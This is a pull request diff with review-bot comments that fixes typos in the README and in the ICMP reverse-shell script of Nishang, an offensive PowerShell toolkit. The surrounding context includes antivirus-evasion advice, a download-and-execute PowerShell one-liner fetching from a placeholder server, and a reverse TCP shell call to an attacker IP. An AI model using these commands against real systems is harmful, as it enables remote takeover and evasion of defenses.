Fix a few typos in readme and ICMP shell #98

Open
wants to merge 2 commits into
base: master
4 changes: 2 additions & 2 deletions README.md
Expand Up @@ -36,7 +36,7 @@ PS C:\nishang> Get-Help Get-WLAN-Keys -Full
```

#### Anti Virus
Nishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:
Nishang scripts are flagged by many Anti Viruses as malicious. The scripts on a target are meant to be used in memory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:

Method 1. Use the in-memory dowload and execute:
Use below command to execute a PowerShell script from a remote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang export a function with same name in the current PowerShell session.
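Review bot: the unchanged context line "Method 1. Use the in-memory dowload and execute:" still carries "dowload" for "download"; since this PR is a typo pass over the README, fix it in the same commit rather than leaving one misspelling two lines below the corrected one. While touching this paragraph, "flagged by many Anti Viruses" reads better as "flagged by many antivirus products", and "export a function with same name" wants "the" ("with the same name").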
Expand All @@ -48,7 +48,7 @@ powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>
Method 2. Use the `-encodedcommand` (or `-e`) parameter of PowerShell
All the scripts in Nishang export a function with same name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`.

Encode the scrript using Invoke-Encode from Nishang:
Encode the script using Invoke-Encode from Nishang:

```powershell
PS C:\nishang> . \nishang\Utility\Invoke-Encode
Expand Down
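Review bot: the context line "add a function call (without quotes) `"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]"`" says "without quotes" but then shows the call wrapped in double quotes inside the backticks, which is exactly the thing a reader copying it will get wrong; drop the inner double quotes so the example matches the instruction. Same paragraph: "export a function with same name" is missing "the", the same wording as in the hunk above, so fix both together.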
6 changes: 3 additions & 3 deletions Shells/Invoke-PowerShellIcmp.ps1
Expand Up @@ -2,7 +2,7 @@ function Invoke-PowerShellIcmp
{
<#
.SYNOPSIS
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.
Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP.

.DESCRIPTION
This script can receive commands from a server, execute them and return the result to the server using only ICMP.
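Review bot: the removed and added .SYNOPSIS lines render identically here ("Nishang script which can be used for a Reverse interactive PowerShell from a target over ICMP."), so this looks like a whitespace-only change (trailing space or line ending). Either state that in the commit message or drop it from a typo PR; an invisible diff in a comment header is noise for anyone bisecting the file later. If it stays, "Reverse" does not need a capital letter mid-sentence.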
Expand All @@ -16,7 +16,7 @@ The IP address of the server/listener to connect to.
Time in seconds for which the script waits for a command from the server. Default is 5 seconds.

.PARAMETER BufferSize
The size of output Buffer. Defualt is 128.
The size of output buffer. Default is 128.

.EXAMPLE
# sysctl -w net.ipv4.icmp_echo_ignore_all=1
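Review bot: "The size of output buffer. Default is 128." is still missing "the" ("The size of the output buffer") and does not say what unit 128 is in; the code further down divides `$sendbytes.length` by `$BufferSize`, so it is a byte count and the doc line should say "Default is 128 bytes" so operators know how it relates to the ICMP payload size they choose on the listener side. The lowercase "buffer" change is fine and matches the plain-English style of the other .PARAMETER entries.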
Expand Down Expand Up @@ -78,7 +78,7 @@ https://github.com/samratashok/nishang
$index = [math]::floor($sendbytes.length/$BufferSize)
$i = 0

#Fragmant larger output into smaller ones to send to the server.
#Fragment larger output into smaller ones to send to the server.
if ($sendbytes.length -gt $BufferSize)
{
while ($i -lt $index )
Expand Down
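Review bot: the corrected comment "#Fragment larger output into smaller ones to send to the server." still leaves the reader to work out that the `while ($i -lt $index )` loop only sends the `[math]::floor($sendbytes.length/$BufferSize)` full-size chunks; since this PR is already editing that comment, extend it to say that the trailing partial chunk (length mod `$BufferSize`) is sent separately after the loop, so the fragmentation logic is readable without tracing the whole function. Minor style point in the same hunk: the stray space in `while ($i -lt $index )` should go.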